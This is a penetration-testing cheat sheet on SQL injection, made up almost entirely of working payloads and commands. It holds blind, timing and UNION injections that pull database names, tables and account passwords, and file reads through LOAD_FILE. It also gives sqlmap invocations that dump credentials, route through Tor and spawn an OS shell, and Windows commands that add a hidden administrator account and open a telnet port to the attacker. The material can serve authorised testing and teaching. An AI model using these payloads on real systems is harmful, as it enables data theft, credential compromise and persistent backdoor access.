A Penetration Testing Framework
Core Idea: Does the page look like it might need to call on stored data?
There exist some SQLi polyglots, i.e (Mathias Karlsson);
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
Works in single quote context, works in double quote context, works in “straight into query” context!
You can also leverage the large database of fuzzlists from Seclists (https://github.com/danielmiessler/SecLists)
##SQL Injection Observations Blind is predominant, Error based is highly unlikely.
SQLMap is king!
Lots of injection in web services!
Technique: Blind SQL Injection - True and False Values
Field: username
True Value (Using Proxy): ' or 1=1 --
False Value (Using Proxy): ' and 1=0 --
' union Select null, null, null, sleep(5) --
Technique: Blind SQL Injection - Timing
Page: login.php
Field: username
Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --
Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1
Technique: Direct Injection
Page: user-info.php
Field: username
Value (Using Proxy): ' union select null,VERSION() AS username,null,null --
Technique: Direct Injection
Page: user-info.php
Field: username
Value (Using Proxy): ' union select null,DATABASE() AS username,null,null --
Technique: Direct Injection
Page: user-info.php
Field: username
Value (Using Proxy): ' union select null,table_schema AS username,null,null from INFORMATION_SCHEMA.TABLES--
Technique: Direct Injection
Page: user-info.php
Field: username
Value (Using Proxy): ' union select null,table_schema AS username,table_name AS password,null from INFORMATION_SCHEMA.TABLES--
Technique: Direct Injection
Recon: Extract table columns from database using a single field
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS--
Technique: Direct Injection
Page: user-info.php
Field: Username
Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --
Technique: Direct Injection
Page: user-info.php
Field: username
Value (relative path):
' union select null, LOAD_FILE('../README') AS username, null, null--
Value (absolute path):
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts') AS username, null, null--
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\inf\\cpu.inf') AS username, null, null--
MySQL Functions:
VERSION() - MySQL server version
USER() - Database user issuing query
DATABASE() - Database on server against which query is running
> http://blabla.com?id=1\
> http://blabla.com?id=1'
# + is the encode of space
> http://blabla.com?id=1\--+
> http://blabla.com?id=1'#
# 3 is our guess for used columns
> http://blabla.com?id=1' order by 3 --+
# We usually get the output for one query only,
# So we should get rid of the first query by searching for
# a non exist value like -1
> http://blabla.com?id=-1' union all select 1,2,3 --+
> http://blabla.com?id=-1' union all select 1,database(),version() --+
# database name = security
> http://blabla.com?id=-1' union all select 1,table_name,3 from information_schema.tables where table_schema='security' --+
# database name = security
> http://blabla.com?id=-1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
> http://blabla.com?id=-1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
> http://blabla.com?id=-1' union all select 1,group_concat(username),group_concat(password) from users --+
It is the same as with quote injection but using \ instead of ' for error detection and not using any thing in injection itself
> sqlmap -u URl -data DataToSentInPost -p PARAMETER(id) --level 3 risk 3 -random-agent --tor --check-tor --delay=500 --randomize=delay
time sqlmap -r /path/to/request/file.txt --fingerprint
You copy the request with header and body from ZAP/burp and save it to a file then
time sqlmap -r /path/to/request/file.txt --fingerprint
time sqlmap -r /path/to/request/file.txt --banner
time sqlmap -r /path/to/request/file.txt --current-user --current-db --hostname --is-dba
time sqlmap -r /path/to/request/file.txt --users --passwords
time sqlmap -r /path/to/request/file.txt --dbs
time sqlmap -r /path/to/request/file.txt -D <db_name> --tables
time sqlmap -r /path/to/request/file.txt -D <db_name> -T <table1, table2> --columns
time sqlmap -r /path/to/request/file.txt -D <db_name> -T <table_name> -C <column1,column2,column3> --dump
Sometimes sqlmap can not find a unique column to figure out how many rows are there, so the work-around is to sort a column value so sqlmap figure out how many row are there
time sqlmap -r /path/to/request/file.txt -D <db_name> -T <table_name> --sql-query="SELECT column4,column7 FROM <db_name>.<table_name> ORDER BY <column4> DESC"
time sqlmap -r /path/to/request/file.txt --sql-query="SELECT column4,column7 FROM <db_name>.<table_name> ORDER BY <column4> DESC"
time sqlmap -r /path/to/request/file.txt -D <Db_name> --sql-query="SELECT column_name from information_schema.columns where table_name = 'user'"
time sqlmap -r /path/to/request/file.txt --prefix="SELSCT * FROM <table_name> WHERE column_name='" --suffix=" -- " --banner
time sqlmap -r /path/to/request/file.txt --os-shell
To see transactions ' tcpdump -i eth1 -vvv -X'
How O/S Shell works
In case of the server is Windows, you can get access through the firewall like that
> sc query state= all
> sc query tlnsvr
> sc config tlnserver start= demand
> sc start tlnsvr
> net user root toor /add
> net localgroup TelnetClients /add
> net localgroup Administrators root /add
> net localgroup TelnetClients root /add
> netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom adresses=<your.public.ip.address>
##Best SQL injection resources